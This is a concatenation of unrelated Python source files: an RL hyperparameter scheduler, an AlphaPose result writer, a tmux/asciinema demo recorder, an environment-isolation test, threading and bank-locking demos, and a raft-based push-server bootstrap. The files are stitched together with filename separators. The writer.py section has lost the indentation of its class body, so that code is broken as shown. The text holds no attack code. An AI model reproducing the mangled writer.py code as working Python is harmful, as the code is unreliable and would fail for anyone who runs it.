        def _async_run_trial():
            self.mp_count.value += 1
            self.mp_seed.value += 1
            seed = self.mp_seed.value
            mx.random.seed(seed)
            with mx.autograd.record():
                # sample one configuration
                with self.lock:
                    config, log_prob, entropy = self.controller.sample(with_details=True)
                config = config[0]
            task = Task(self.train_fn, {'args': self.args, 'config': config},
                        DistributedResource(**self.resource))
            # start training task
            reporter = DistStatusReporter(remote=task.resources.node)
            task.args['reporter'] = reporter
            task_thread = self.add_job(task)
            # run reporter
            last_result = None
            config = task.args['config']
            while task_thread.is_alive():
                reported_result = reporter.fetch()
                if reported_result.get('done', False):
                    reporter.move_on()
                    task_thread.join()
                    break
                self._add_training_result(task.task_id, reported_result, task.args['config'])
                reporter.move_on()
                last_result = reported_result
            # NOTE(review): if the task dies before reporting, last_result is
            # None and the two lines below raise — confirm tasks always report.
            self.searcher.update(config, **last_result)
            reward = last_result[self._reward_attr]
            with self.lock:
                if self.baseline is None:
                    self.baseline = reward
            avg_reward = mx.nd.array([reward - self.baseline], ctx=self.controller.context)
            # negative policy gradient
            with self.lock:
                loss = -log_prob * avg_reward.reshape(-1, 1)
                loss = loss.sum()
            # update (stray print() replaced with a debug log entry)
            logger.debug('controller loss: {}'.format(loss))
            with self.lock:
                try:
                    loss.backward()
                    self.controller_optimizer.step(1)
                except Exception:
                    self.mp_fail.value += 1
                    logger.warning('Exception during backward {}.'.format(self.mp_fail.value))
            self.mp_count.value -= 1
            # ema
            with self.lock:
                decay = self.ema_baseline_decay
                self.baseline = decay * self.baseline + (1 - decay) * reward

        reporter_threads = []
        for i in range(self.num_trials):
            # Throttle: never exceed controller_batch_size concurrent trials.
            while self.mp_count.value >= self.controller_batch_size:
                time.sleep(0.2)
            reporter_thread = threading.Thread(target=_async_run_trial)
            reporter_thread.start()
            reporter_threads.append(reporter_thread)
        for p in reporter_threads:
            p.join()

    def sync_schedule_tasks(self, configs):
        """Launch one task per config, wait for all, and return their rewards
        in the same order as *configs*."""
        rewards = []
        results = {}
        def _run_reporter(task, task_job, reporter):
            last_result = None
            config = task.args['config']
            while not task_job.done():
                reported_result = reporter.fetch()
                if 'traceback' in reported_result:
                    logger.exception(reported_result['traceback'])
                    reporter.move_on()
                    break
                if reported_result.get('done', False):
                    reporter.move_on()
                    break
                self._add_training_result(task.task_id, reported_result, task.args['config'])
                reporter.move_on()
                last_result = reported_result
            if last_result is not None:
                self.searcher.update(config, **last_result)
                with self.lock:
                    # Configs are dicts (unhashable); key results by pickle.
                    results[pickle.dumps(config)] = \
                        last_result[self._reward_attr]
        # launch the tasks
        tasks = []
        task_jobs = []
        reporter_threads = []
        for config in configs:
            logger.debug('scheduling config: {}'.format(config))
            # create task
            task = Task(self.train_fn, {'args': self.args, 'config': config},
                        DistributedResource(**self.resource))
            reporter = DistStatusReporter()
            task.args['reporter'] = reporter
            task_job = self.add_job(task)
            # run reporter
            reporter_thread = threading.Thread(target=_run_reporter, args=(task, task_job, reporter))
            reporter_thread.start()
            tasks.append(task)
            task_jobs.append(task_job)
            reporter_threads.append(reporter_thread)
        for p1, p2 in zip(task_jobs, reporter_threads):
            p1.result()
            p2.join()
        # NOTE(review): ``self.LOCK`` (inherited class-level lock) is distinct
        # from ``self.lock`` used above — confirm the two-lock scheme is intended.
        with self.LOCK:
            for task in tasks:
                self.finished_tasks.append({'TASK_ID': task.task_id,
                                            'Config': task.args['config']})
        if self._checkpoint is not None:
            logger.debug('Saving Checkpoint')
            self.save()
        for config in configs:
            rewards.append(results[pickle.dumps(config)])
        return rewards

    def add_job(self, task, **kwargs):
        """Adding a training task to the scheduler.
        Args:
            task (:class:`autogluon.scheduler.Task`): a new training task
        """
        cls = RLScheduler
        cls.resource_manager._request(task.resources)
        # main process
        job = cls._start_distributed_job(task, cls.resource_manager)
        return job

    def join_tasks(self):
        """No-op: jobs are joined through their reporter threads."""
        pass

    def state_dict(self, destination=None):
        """Returns a dictionary containing a whole state of the Scheduler
        Examples
        --------
        >>> ag.save(scheduler.state_dict(), 'checkpoint.ag')
        """
        if destination is None:
            destination = OrderedDict()
            destination._metadata = OrderedDict()
        logger.debug('\nState_Dict self.finished_tasks: {}'.format(self.finished_tasks))
        destination['finished_tasks'] = pickle.dumps(self.finished_tasks)
        destination['baseline'] = pickle.dumps(self.baseline)
        destination['TASK_ID'] = Task.TASK_ID.value
        destination['searcher'] = self.searcher.state_dict()
        destination['training_history'] = json.dumps(self.training_history)
        if self.visualizer == 'mxboard' or self.visualizer == 'tensorboard':
            destination['visualizer'] = json.dumps(self.mxboard._scalar_dict)
        return destination

    def load_state_dict(self, state_dict):
        """Load from the saved state dict.
        Examples
        --------
        >>> scheduler.load_state_dict(ag.load('checkpoint.ag'))
        """
        self.finished_tasks = pickle.loads(state_dict['finished_tasks'])
        # NOTE(review): the baseline is saved but deliberately not restored
        # here — confirm training should restart with a fresh baseline.
        #self.baseline = pickle.loads(state_dict['baseline'])
        Task.set_id(state_dict['TASK_ID'])
        self.searcher.load_state_dict(state_dict['searcher'])
        self.training_history = json.loads(state_dict['training_history'])
        if self.visualizer == 'mxboard' or self.visualizer == 'tensorboard':
            self.mxboard._scalar_dict = json.loads(state_dict['visualizer'])
        logger.debug('Loading Searcher State {}'.format(self.searcher))
|
writer.py | import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms, write_json
# Fallback cv2.VideoWriter options used when the caller does not pass its own
# ``video_save_opt`` to DataWriter: output path, codec, fps and frame size.
DEFAULT_VIDEO_SAVE_OPT = {
    'savepath': 'examples/res/1.mp4',
    'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
    'fps': 25,
    'frameSize': (640, 480)
}
# Keypoint indices evaluated by default (17 joints); DataWriter.update swaps
# this for 26- or 136-joint ranges depending on the heatmap channel count.
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_flow:
from trackers.PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
    def start(self):
        """Launch the asynchronous result-writing worker.

        Returns self so calls can be chained (``DataWriter(...).start()``).
        """
        # start a thread to read pose estimation results per frame
        self.result_worker = self.start_worker(self.update)
        return self
def update(self):
final_result = []
norm_type = self.cfg.LOSS.get('NORM_TYPE', None)
hm_size = self.cfg.DATA_PRESET.HEATMAP_SIZE
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
if self.save_video:
stream.release()
write_json(final_result, self.opt.outputpath, form=self.opt.format, for_eval=self.opt.eval)
print("Results have been written to json.")
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None or len(boxes) == 0:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
assert hm_data.dim() == 4
#pred = hm_data.cpu().data.numpy()
if hm_data.size()[1] == 136:
self.eval_joints = [*range(0,136)]
elif hm_data.size()[1] == 26:
self.eval_joints = [*range(0,26)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(hm_data[i][self.eval_joints], bbox, hm_shape=hm_size, norm_type=norm_type)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
if not self.opt.pose_track:
boxes, scores, ids, preds_img, preds_scores, pick_ids = \
pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
_result = []
for k in range(len(scores)):
_result.append(
{
'keypoints':preds_img[k],
'kp_score':preds_scores[k],
'proposal_score': torch.mean(preds_scores[k]) + scores[k] + 1.25 * max(preds_scores[k]),
'idx':ids[k],
'box':[boxes[k][0], boxes[k][1], boxes[k][2]-boxes[k][0],boxes[k][3]-boxes[k][1]]
}
)
result = {
'imgname': im_name,
'result': _result
}
if self.opt.pose_flow:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
final_result.append(result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
print("im_name.split('/')[-1])",im_name.split('/')[-1])
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name.split('/')[-1]), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
self.result_worker.join()
def terminate(self):
# directly terminate
self.result_worker.terminate()
def clear_queues(self):
self.clear(self.result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def results(self):
# return final result
print(self.final_result)
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
clidirector.py | import json
import libtmux
import random
import subprocess
import threading
import time
import typing
class InstructionSpec(typing.NamedTuple):
    """One on-screen instruction overlay and the time window it is shown."""
    # Rendered instruction text (prefixed with its sequence number).
    instruction: str
    # Seconds, relative to recording start, when the instruction appears.
    time_from: float
    # Seconds when the instruction disappears.
    time_to: float
class CliDirector:
    """Drives a scripted tmux session and records it with asciinema.

    Simulates human typing with randomized inter-key delays, can display
    tmux status-line messages and popups, and collects timed
    InstructionSpec entries for rendering alongside the recording.
    """

    def __init__(self):
        # Wall-clock time when recording started; None while not recording.
        self.record_start = None
        # Base delay, in seconds, between simulated key presses.
        self.pause_between_keys = 0.2
        # Timed overlay instructions collected during the recording.
        self.instructions: typing.List[InstructionSpec] = []

    def start(self, filename: str, width: int = 0, height: int = 0) -> libtmux.Session:
        """Start a tmux session and immediately begin recording to `filename`."""
        self.start_session(width, height)
        self.start_recording(filename)
        return self.tmux_session

    def start_session(self, width: int = 0, height: int = 0) -> libtmux.Session:
        """Create (replacing any existing) the 'asciinema_recorder' session."""
        self.tmux_server = libtmux.Server()
        self.tmux_session = self.tmux_server.new_session(session_name="asciinema_recorder", kill_session=True)
        self.tmux_pane = self.tmux_session.attached_window.attached_pane
        self.tmux_version = self.tmux_pane.display_message("#{version}", True)
        if width and height:
            self.resize_window(width, height)
        # Give the terminal a moment to settle before anything is recorded.
        self.pause(3)
        return self.tmux_session

    def start_recording(self, filename: str) -> None:
        """Attach asciinema to the tmux session and note the start time."""
        self.asciinema_proc = subprocess.Popen([
            "asciinema", "rec", "-y", "--overwrite", "-c", "tmux attach -t asciinema_recorder", filename])
        self.pause(1.5)
        self.record_start = time.time()

    def resize_window(self, width: int, height: int) -> None:
        """Resize the controlling terminal via the external `resize` tool."""
        subprocess.Popen(["resize", "-s", str(height), str(width)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    def end(self) -> None:
        """Stop recording, then tear down the tmux session."""
        self.end_recording()
        self.end_session()

    def end_recording(self) -> None:
        """Terminate asciinema and reset all recording state."""
        self.asciinema_proc.terminate()
        self.asciinema_proc.wait(timeout=5)
        self.record_start = None
        self.instructions = []

    def end_session(self) -> None:
        """Kill the tmux session."""
        self.tmux_session.kill_session()

    def press_key(self, keys: str, count=1, pause: typing.Optional[float] = None, target = None) -> None:
        """Send `keys` to a pane `count` times with humanized random pauses."""
        if pause is None:
            pause = self.pause_between_keys
        if target is None:
            target = self.tmux_pane
        for i in range(count):
            if keys == " ":
                keys = "Space"  # tmux send-keys name for the space bar
            target.send_keys(cmd=keys, enter=False, suppress_history=False)

            # inspired by https://github.com/dmotz/TuringType
            real_pause = random.uniform(0, pause) + 0.4 * pause
            if keys == "Space":
                real_pause += 1.5 * pause
            elif keys == ".":
                real_pause += pause
            elif random.random() > 0.75:
                real_pause += pause
            elif random.random() > 0.95:
                # NOTE(review): this branch is only reached when the first
                # draw is <= 0.75 and uses a fresh random draw — presumably
                # intentional weighting; confirm.
                real_pause += 2 * pause
            self.pause(real_pause)

    def type(self, keys: str, pause: typing.Optional[float] = None, target = None) -> None:
        """Type a string one character at a time into `target`."""
        if pause is None:
            pause = self.pause_between_keys
        if target is None:
            target = self.tmux_pane
        target.select_pane()
        for key in keys:
            self.press_key(key, pause=pause, target=target)

    def exec(self, keys: str, target = None) -> None:
        """Type a command, pause as if reviewing it, then press Enter."""
        if target is None:
            target = self.tmux_pane
        self.type(keys, target=target)
        self.pause(1.25)
        self.press_key("Enter", target=target)
        self.pause(0.5)

    def focus_pane(self, pane: libtmux.Pane, set_active_pane: bool = True) -> None:
        """Select `pane`; optionally make it the default target pane."""
        pane.select_pane()
        if set_active_pane:
            self.tmux_pane = pane

    def pause(self, seconds: float) -> None:
        """Sleep for `seconds` (all timing goes through this hook)."""
        time.sleep(seconds)

    def run_external(self, command: str) -> None:
        """Run a shell command outside the recorded tmux session."""
        subprocess.run(command, shell=True)

    def message(self, msg: str, duration: typing.Optional[int] = None, add_instruction: bool = True, instruction_html: str = "") -> None:
        """Show `msg` in the tmux status line and record an instruction.

        Duration defaults to a reading-speed heuristic of 0.08 s per character.
        """
        if duration is None:
            duration = len(msg) * 0.08  # seconds
        self.tmux_session.set_option("display-time", int(duration * 1000))  # milliseconds
        self.tmux_pane.display_message(" " + msg)
        if add_instruction or instruction_html:
            if not instruction_html:
                instruction_html = msg
            self.instruction(instruction=instruction_html, duration=duration)
        self.pause(duration + 0.5)

    def popup(self, content: str, duration: int = 4) -> None:
        """Show a tmux popup with `content` for `duration` seconds."""
        # todo: check if installed tmux version supports display-popup
        # tmux's display-popup is blocking, so we close it in a separate thread
        t = threading.Thread(target=self.close_popup, args=[duration])
        t.start()
        lines = content.splitlines()
        self.tmux_pane.cmd("display-popup", "", *lines)
        t.join()

    def close_popup(self, duration: float = 0) -> None:
        """After `duration` seconds, close any open tmux popup."""
        self.pause(duration)
        self.tmux_pane.cmd("display-popup", "-C")

    def instruction(self, instruction: str, duration: float = 3, time_from: typing.Optional[float] = None) -> None:
        """Record a numbered instruction shown from `time_from` for `duration`."""
        if time_from is None:
            time_from = self.current_time
        self.instructions.append(InstructionSpec(
            instruction = str(len(self.instructions) + 1) + ". " + instruction,
            time_from = round(time_from, 1),
            time_to = round(time_from + duration, 1)
        ))

    def save_instructions(self, output_path: str) -> None:
        """Write the collected instructions to `output_path` as JSON."""
        instr_as_dicts = []
        for instr in self.instructions:
            instr_as_dicts.append(instr._asdict())
        with open(output_path, 'w', encoding='utf-8') as f:
            json.dump(instr_as_dicts, f, ensure_ascii=False, indent=4)

    @property
    def current_time(self) -> float:
        """Seconds elapsed since recording started.

        NOTE(review): assumes start_recording() was called; raises TypeError
        if record_start is still None — confirm callers respect this.
        """
        now = time.time()
        return round(now - self.record_start, 1)

    @property
    def current_pane(self) -> libtmux.Pane:
        """The pane key presses are currently directed at."""
        return self.tmux_pane
|
02_env_isolation_agent.py | #!/usr/bin/env python3
import re
import os
import sys
import copy
import pprint
import multiprocessing as mp
import radical.utils as ru
# # fuck python
# from .00_env_isolation_utils import env_read, env_diff
# from .03_env_isolation_exec import executor
# The module file names start with digits, so normal import syntax cannot
# reference them (see the commented-out imports above); use __import__.
eiu = __import__('00_env_isolation_utils')
eie = __import__('03_env_isolation_exec')

env_read = eiu.env_read
env_diff = eiu.env_diff
executor = eie.executor

# ------------------------------------------------------------------------------
#
# the agent may change the environment further
#
os.environ['RP_TEST'] = 'AGENT'
os.environ['RP_TEST_AGENT'] = 'True'

# run the executor which will start the task wrapper script. The executor here
# inherits the agent environment.
p = mp.Process(target=executor)
p.start()
p.join()

# at this point the task has been completed, and will have dumped the
# environment it encountered into `./env.check`. We read that env and
# compare it to the original env
env_boot = env_read('./env.boot.env')
env_check = env_read('./env.check.env')

# # some debug print for what changed in the env for the task
# only_boot, only_check, changed = env_diff(env_boot, env_check)
#
# print('------------- only env_boot')
# pprint.pprint(only_boot)
# print('------------- only env_check')
# pprint.pprint(only_check)
# print('------------- changed')
# pprint.pprint(changed)
|
EXPERIMENT.py | import concurrent.futures
import threading
import time
def sendMail(st):
    """Pretend to send a mail to `st`: wait two seconds, log, and report.

    Returns:
        A "Done <st>" confirmation string.
    """
    time.sleep(2)
    notice = "printing ...{}".format(st)
    print(notice)
    return "Done {}".format(st)
# Demo recipient lists used by the test functions below.
student = ['student1', 'student2', 'student3', 'student4']
st = ['stud1', 'stud2', 'stud3', 'stud4']
def test1():
    """Send a mail per student concurrently via a thread pool.

    The executor's context manager blocks until every submitted call
    completes. (Removed the unused `message` local, which suggested
    error handling that was never implemented.)
    """
    with concurrent.futures.ThreadPoolExecutor() as executor:
        for name in student:
            executor.submit(sendMail, name)
def test2():
    """Send a mail per student, one thread each, joined sequentially.

    Note: Thread.start() and Thread.join() return None, so both prints
    emit "None"; kept for parity with the original debug output.
    (Fix: removed a dangling `x.` expression that was a syntax error.)
    """
    for s in student:
        x = threading.Thread(target=sendMail, args=(s,))
        print(x.start())
        print(x.join())
def test3():
    """Fire off a single mail-sending thread for the whole `st` list."""
    worker = threading.Thread(target=sendMail, args=(st,))
    worker.start()
# Script entry: runs at import time (the original has no __main__ guard).
test2()
test3()
# Printed before test3's worker finishes its 2-second sleep.
print("first")
safe_bank_fine_grained.py | import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
    """A bank account whose balance is guarded by its own re-entrant lock."""
    def __init__(self, balance=0):
        self.balance = balance  # current funds
        self.lock = RLock()     # per-account lock for fine-grained locking
def main():
    """Spin up five transfer workers and verify the bank stays consistent."""
    accounts = create_accounts()
    total = sum(acct.balance for acct in accounts)
    validate_bank(accounts, total)

    print("Starting transfers...")
    workers = [
        Thread(target=do_bank_stuff, args=(accounts, total))
        for _ in range(5)
    ]

    started_at = datetime.datetime.now()
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    elapsed = datetime.datetime.now() - started_at

    print("Transfers complete ({:,.2f}) sec".format(elapsed.total_seconds()))
    validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
    """Run ~10k random transfers, quietly spot-checking consistency after each."""
    for _ in range(9999):
        src, dst = get_two_accounts(accounts)
        do_transfer(src, dst, random.randint(1, 100))
        validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
    """Build the demo bank: six accounts with fixed starting balances."""
    starting_balances = (5000, 10000, 7500, 7000, 6000, 9000)
    return [Account(balance=amount) for amount in starting_balances]
def do_transfer(from_account: Account, to_account: Account, amount: int):
    """Move `amount` between accounts using deadlock-free fine-grained locks.

    Both locks are always acquired in id() order, so two concurrent
    opposite-direction transfers between the same pair cannot deadlock.
    """
    if from_account.balance < amount:
        return

    first, second = sorted((from_account, to_account), key=id)
    with first.lock:
        with second.lock:
            from_account.balance -= amount
            time.sleep(0.000)
            to_account.balance += amount
transfer_lock = RLock()
def do_transfer_global_style(from_account: Account, to_account: Account, amount: int):
    """Transfer under one global lock (coarse-grained alternative to do_transfer)."""
    if amount > from_account.balance:
        return

    with transfer_lock:
        from_account.balance -= amount
        time.sleep(0.000)
        to_account.balance += amount
def validate_bank(accounts: 'List[Account]', total: int, quiet=False):
    """Check that the sum of all balances still equals `total`.

    All account locks are held while summing so no transfer can be observed
    half-applied. Locks are acquired in id() order — the same order
    do_transfer uses — so the audit cannot deadlock against in-flight
    transfers, and released in a try/finally so an error cannot leak them.
    (Previously: side-effect list comprehensions acquired/released in list
    order with no finally.)

    Args:
        accounts: accounts to audit; each exposes .balance and .lock.
        total: expected combined balance.
        quiet: when True, only inconsistencies are reported.
    """
    ordered = sorted(accounts, key=id)
    for acct in ordered:
        acct.lock.acquire()
    try:
        current = sum(acct.balance for acct in ordered)
    finally:
        for acct in reversed(ordered):
            acct.lock.release()

    if current != total:
        print(
            "ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
                current, total
            ),
            flush=True,
        )
    elif not quiet:
        print("All good: Consistent account balance: ${:,}".format(total), flush=True)
def get_two_accounts(accounts):
    """Return two distinct accounts chosen uniformly at random."""
    first = random.choice(accounts)
    while True:
        second = random.choice(accounts)
        if second != first:
            return first, second
# Run the demo when executed directly.
if __name__ == "__main__":
    main()
|
push_server.py | #!/usr/bin/python3
def main(config_fname=None):
    """Boot one push-server node: join or form the raft cluster, export
    services through a PushManager, and optionally serve a web frontend.

    Args:
        config_fname: path to the node config file; when None, taken from
            sys.argv[1].
    """
    import asyncio
    import socket
    import time

    import dill
    import tornado.httpserver
    import tornado.web

    from pysyncobj import SyncObj, SyncObjConsumer
    from pysyncobj import SyncObjConf

    from pushpy.batteries import ReplLockDataManager
    from pushpy.code_store import load_in_memory_module, create_in_memory_module
    from pushpy.host_resources import HostResources, GPUResources, get_cluster_info, get_partition_info
    from pushpy.push_manager import PushManager
    from pushpy.push_server_utils import load_config, serve_forever, host_to_address

    if config_fname is None:
        import sys
        config_fname = sys.argv[1]

    config = load_config(config_fname)
    config_bootstrap = config['bootstrap']
    config_manager = config['manager']
    manager_auth_key = (config_manager.get('auth_key') or 'password').encode('utf8')
    base_host = config.get('hostname') or socket.gethostname()

    if 'manager_host' in config_bootstrap:
        # Join an existing cluster: fetch peers, ports and boot code from
        # the bootstrap peer's manager.
        bootstrap_manager_host = config_bootstrap['manager_host']
        print(f"bootstrapping config from {bootstrap_manager_host} {manager_auth_key}")
        bootstrap_manager = PushManager(address=host_to_address(bootstrap_manager_host), authkey=manager_auth_key)
        bootstrap_manager.connect()
        bootstrap_primary = bootstrap_manager.bootstrap_peer()
        peer_config = bootstrap_primary.get_config(base_host, default_base_port=10000)
        sync_obj_port = peer_config['base_port']
        sync_obj_peers = peer_config['sync_obj_config']['peers']
        sync_obj_password = peer_config['sync_obj_config']['password']
        boot_src = dill.loads(peer_config['boot_src'])
        boot_mod, _ = load_in_memory_module(boot_src, name="boot_mod")
    else:
        # First node: load boot code locally and read cluster settings
        # straight from the config file.
        bootstrap_primary = None
        boot_source_uri = config_bootstrap['boot_source_uri']
        boot_mod, boot_src = load_in_memory_module(boot_source_uri, name="boot_mod")
        config_sync_obj = config['sync_obj']
        sync_obj_port = int(config_sync_obj.get('port') or 10000)
        sync_obj_peers = config_sync_obj.get('peers') or []
        sync_obj_password = config_sync_obj['password'].encode('utf-8') if 'password' in config_sync_obj else None

    # Derive manager/web ports from the raft port when not set explicitly.
    manager_port = int(config_manager.get('port') or (sync_obj_port % 1000) + 50000)
    web_port = int((config.get('web') or {}).get('port') or (sync_obj_port % 1000) + 11000)

    sync_obj_host = f"{base_host}:{sync_obj_port}"
    manager_host = f"{base_host}:{manager_port}"

    print(f"sync_obj_host: {sync_obj_host} peers:{sync_obj_peers}")
    print(f"manager_host: {manager_host}")

    class DoRegistry:
        """Exposes the names registered on this node's PushManager."""
        def apply(self):
            return list(PushManager._registry.keys())

    # Replicated host registry; the lock auto-expires so dead hosts drop out.
    repl_hosts = ReplLockDataManager(autoUnlockTime=5)

    boot_globals, web_router = boot_mod.main()
    boot_consumers = [x for x in boot_globals.values() if isinstance(x, SyncObjConsumer) or hasattr(x, '_consumer')]

    # Nodes observed as disconnected; drained by drop_disconnected_peers().
    drop_connections_list = []

    def on_state_change(oldState, newState):
        """Raft state callback: queue disconnected peers for removal.

        NOTE(review): newState == 2 presumably means "became leader" —
        confirm against pysyncobj's state constants.
        """
        print(f"on_state_change: {oldState} {newState}")
        if newState == 2:
            for o in sync_obj.otherNodes:
                if not sync_obj.isNodeConnected(o):
                    # print(f"removing disconnected node: {o.address}")
                    # sync_obj.removeNodeFromCluster("127.0.0.1:10000")
                    drop_connections_list.append(o)

    def drop_disconnected_peers():
        """Daemon loop: while leader, evict still-disconnected queued peers."""
        # sync_obj.removeOnTickCallback(drop_disconnected_peers)
        while(True):
            if sync_obj._isLeader():
                while len(drop_connections_list) > 0:
                    o = drop_connections_list.pop()
                    if not sync_obj.isNodeConnected(o):
                        print(f"removing disconnected node: {o.address}")
                        sync_obj.removeNodeFromCluster(o.id)
            time.sleep(1)

    sync_config = SyncObjConf(dynamicMembershipChange=True, onStateChanged=on_state_change)
    # sync_config.appendEntriesBatchSizeBytes = 2**27
    # sync_config.journalFile = f'./logs/{sync_obj_host}.journal'
    # sync_config.fullDumpFile = f'./logs/{sync_obj_host}.dump'

    sync_obj = SyncObj(sync_obj_host, sync_obj_peers, consumers=[repl_hosts, *boot_consumers], conf=sync_config)
    # sync_obj.addOnTickCallback(drop_disconnected_peers)

    import threading
    thread = threading.Thread(target=drop_disconnected_peers, daemon=True)
    thread.start()

    if bootstrap_primary is not None:
        print(f"adding self to cluster {sync_obj_host}")
        bootstrap_primary.apply(sync_obj_host)

    class DoBootstrapPeer:
        """Remote-callable helper that lets new nodes join this cluster."""

        def get_host_map(self, hosts):
            """Group the known nodes' ports by hostname."""
            print(hosts)
            host_port_map = dict()
            for host in hosts:
                h, p = host.address.split(":")
                arr = host_port_map.get(h)
                if arr is None:
                    arr = []
                    host_port_map[h] = arr
                arr.append(int(p))
            print(host_port_map)
            return host_port_map

        def get_config(self, hostname, default_base_port):
            """Pick a free raft port for `hostname` and return its join config."""
            connected_peers = [o for o in sync_obj.otherNodes if sync_obj.isNodeConnected(o)]
            hosts = [sync_obj.selfNode, *connected_peers]
            host_port_map = self.get_host_map(hosts)
            host_ports = host_port_map.get(hostname, [])
            # Linear-probe upward until a port not already used on that host.
            host_port = default_base_port + 1
            while host_port in host_ports:
                print(host_port, host_ports)
                host_port += 1
            return {
                "base_port": host_port,
                "sync_obj_config": {
                    'peers': [x.address for x in hosts],
                    'password': sync_obj_password
                },
                "boot_src": dill.dumps(boot_src)
            }

        def apply(self, peer_address):
            """Add a newly bootstrapped peer to the raft cluster."""
            print(f"adding node to cluster: {peer_address}")
            sync_obj.addNodeToCluster(peer_address)

    l_get_cluster_info = lambda: get_cluster_info(repl_hosts)
    l_get_partition_info = lambda: get_partition_info(repl_hosts, sync_obj)

    host_resources = HostResources.create(host_id=sync_obj.selfNode.id, mgr_host=manager_host)
    # override GPU presence if desired
    gpu_count = (((config.get('host_resources') or {}).get('gpu')) or {}).get('count')
    if gpu_count is not None:
        host_resources.gpu = GPUResources(count=gpu_count)

    boot_globals['host_id'] = host_resources.host_id
    boot_globals['get_cluster_info'] = l_get_cluster_info
    boot_globals['get_partition_info'] = l_get_partition_info
    boot_globals['host_resources'] = host_resources

    PushManager.register('sync_obj', callable=lambda: sync_obj)
    PushManager.register('bootstrap_peer', callable=lambda: DoBootstrapPeer())
    PushManager.register('get_registry', callable=lambda: DoRegistry())
    PushManager.register("get_cluster_info", callable=lambda: l_get_cluster_info)
    PushManager.register("get_partition_info", callable=lambda: l_get_partition_info)
    PushManager.register("host_resources", callable=lambda: host_resources)

    # Expose the boot globals as an importable in-memory module and register
    # selected names on the manager.
    boot_common = create_in_memory_module(name="boot_common")
    for k, v in boot_globals.items():
        boot_common.__dict__[k] = v
        if k.startswith("repl_") or k.startswith("local_"):
            # https://stackoverflow.com/questions/2295290/what-do-lambda-function-closures-capture
            PushManager.register(k, callable=lambda vv=v: vv)

